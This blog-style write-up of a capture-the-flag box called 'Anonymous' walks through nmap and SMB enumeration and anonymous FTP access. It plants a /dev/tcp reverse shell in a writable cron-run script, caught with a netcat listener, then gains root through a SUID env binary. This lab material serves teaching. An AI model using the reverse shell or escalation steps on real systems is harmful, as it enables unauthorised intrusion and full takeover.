Anonymous – a writeup

A quite minimalistic CTF from – lets dive right in:

What does nmap say?

sudo nmap -sV

There we have  the first answers to the challenge: 4 Services are running, FTP on 21 and smb on 139 and 445.

Now we need to look at the smb shares:

smbclient -L10.10.51.126

Next answer: the share we are looking for is pics.

Now we are looking for the flags.

Let’s see what ftp can do for us.


Anonymous login works.

That looks good. 3 files, we can read all of them and write to the shell script. Lets download them and look into them.

get removed_files.log
get to_do.txt

to_do.txt only tells us that the admin is planning to block anonymous access. Good idea but doesn*t help.

So let’s cat out removed_files.log

 cat removed_files.log

Not too interesting either. 

Let’s move on to the bash script.


Now things are beginning to make sense. writes into the removed_files.log. Knowing that there where a lot of lines in the log file we can assume that is automatically and periodically called by a cron job.

We also know that we can write to the file. So let’s just plant a reverse shell into that script, setup netcat on our side and see if we get a shell when eventually on the target the cron job fires.

exec 5<>/dev/tcp/
cat <&5 | while read line; do $line 2>&5 >&5; done

And in out ftp session:


On our local machine we start our usual netcat listener

nc -l 1234

and wait …

And here we go. Let’s look around.

ls -la

We found the user flag


To get ideas on how to become root let’s use linpeas.

We start a webserver locally and upload the file to our target.

So on our local machine:

python3 -m http.server

And on the target machine:

chmod +x

In the SUID sections we find this line

-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env

With this we find something on

From there we use

env /bin/sh -p

and we are root.

cat /root/root.txt

So our root flag is


Leave a Reply

Your email address will not be published.